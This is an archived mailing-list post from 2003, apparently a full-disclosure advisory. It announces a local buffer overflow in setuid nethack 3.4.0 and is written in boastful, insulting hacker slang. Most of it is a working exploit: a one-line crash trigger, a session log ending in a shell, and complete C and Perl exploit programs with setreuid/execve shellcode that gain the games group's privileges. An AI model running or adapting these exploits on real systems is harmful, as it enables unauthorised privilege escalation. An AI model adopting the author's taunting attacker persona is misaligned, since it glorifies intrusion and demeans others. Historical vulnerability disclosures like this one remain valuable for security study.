lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200302090718.h197Io8S015122@mailserver2.hushmail.com>
From: tsao_4sh0 at hushmail.com (tsao_4sh0@...hmail.com)
Subject: #!ICadv-02.09.03: nethack 3.4.0 local buffer overflow

-----BEGIN PGP SIGNED MESSAGE-----

###################################################

/usr/games/lib/nethackdir/nethack - LOCALLY EXPLOITABLE BUFFER

try th1s: nethack -s `perl -e "print 'A' x 1000"`

nethack.RPM package for redhat 8 is installed SETUID GAMES!@)~*


ther pre compiled b1nz for come for Amiga, Atari, Linux, Mac, Msdos
OS/2, Windows. br0 u can even dl source and own it on *BSD, System V,
Solaris, HP-UX, BeOS and VMS! How tight is th1s w4r3z y0

thatz right, we can snatch games prives.. this are highly sought
after privz.. with th1s we can do stuff like.. writing our own highscore
files & such.. use it to impress your friends.. u will be the ULTIMATE
NETHACKER!


ch3ck th1s:

[tsao@c:\ tmp]$ ./n 224 400
shellcode at 159->220
Using bffff6d8

Cannot find any current entries for )���۳
                                         F�^FF

                                              V
                                               1ۉ��/bin/sh�
Call is: nethack -s [-v] [-role] [maxrank] [playernames]
sh-2.05b$ id
uid=12(games) gid=500(tsao) groups=500(tsao)

to all the people who think this is lame: ANY PRIVILEDGE ESCALATION IS
BAD BUSINESS!


greets: #!IC@...ET / d4yj4y(lub yew bro.. thnx for help with C code)
greets: The-Rev - that regedit question was da b0mb. bizz0mb.
dis: #phrack@...ET / the_ut -- I told you guys i was skilled & could code.

Attached is a C & PERL exploit, this is incase you do not have a C
compiler. I cover all the bases for u.

stay tuned for ftpd/apache warez, im pumping out more 0day than the_ut pumpz out
lame questionz to test my skillz..


p.s [tsao@c:\ tmp]# ssh -l tsao4sh0 phrack.ru -p 31337
    [root@phc /]# WHOZ THE UNIX TERRORIST NOW ?

p.p.s im gonna drop 7350 warez soon, year of the leak bitchez.

p.p.p.s squashing bugz is fun!

attached: nethacker.c / nethacker.pl

<cut-me-here!!!!!!!! nethacker.c cut-me-here!!!!!!!>
/*
        tsao@...et #!IC@...et 2k3
        thnx to aleph1 for execve shellcode &
        davidicke for setreuid() shellcode
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


char code[] =

"\x29\xc4\x31\xc0\x31\xc9\x31\xdb\xb3\x0c\x89\xd9\xb0\x46\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";



unsigned long sp(void) {
   __asm__("movl %esp,%eax");
}

int main(int argc, char **argv) {
     char *p;
     int i, off;

     p = malloc(sizeof(char) * atoi(argv[1]));
     memset(p,0x90,atoi(argv[1]));

     off = 220 - strlen(code);
     printf("shellcode at %d->%d\n",off,off+strlen(code));
     for(i=0;i<atoi(argv[1]);i++)
       p[i+off] = code[i];


     *(long *) &p[220] = sp() - atoi(argv[2]);
     printf("Using %x\n",sp() - atoi(argv[2]));

     execl("/usr/games/lib/nethackdir/nethack","nethack","-s",p,0);
     perror("wtf");
}

<eof-nethacker.c!!!!!!! eof-nethacker.c!!!!!!>

<cut-me-here nethacker.pl !!!!!! cut-me-here nethacker.pl!!!!>

#!/usr/bin/perl -w
#
# tsao@...et #!IC@...et 2k3
# thnx to aleph1 for execve shellcode
# davidicke for setreuid() shellcode


$sc .= "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x0c\x31\xc0\xb0\x46\xcd\x80\x31\xdb";
$sc .= "\x31\xc9\xb3\x0c\xb1\x0c\x31\xc0\xb0\x46\xcd\x80\xeb\x24\x5e\x8d\x1e\x89\x5e";
$sc .= "\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12";
$sc .= "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff\x2f\x62";
$sc .=  "\x69\x6e\x2f\x73\x68\x01";

for ($i = 0; $i < (224 - (length($sc)) - 4); $i++) {
    $buf .= "\x90";
}

$buf .= $sc;
$buf .= "\xd2\xf8\xff\xbf";

exec("/usr/games/lib/nethackdir/nethack -s '$buf'");

<eof-nethacker.pl!!!!! eof-nethacker.pl!!!!>


tsao@...et #!IC@...et 2k3
tsao - owning ^ x.25 like none other.. fuq u jj
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wl4EARECAB4FAj5GANIXHHRzYW9fNHNoMEBodXNobWFpbC5jb20ACgkQj944mCS4M3Xk
SgCgv5FJ4mn7EhQmO3kIKjiNHn8Ze9kAn2Bt46OsJepEYFlAlSe/ttoZiFpD
=GlgW
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ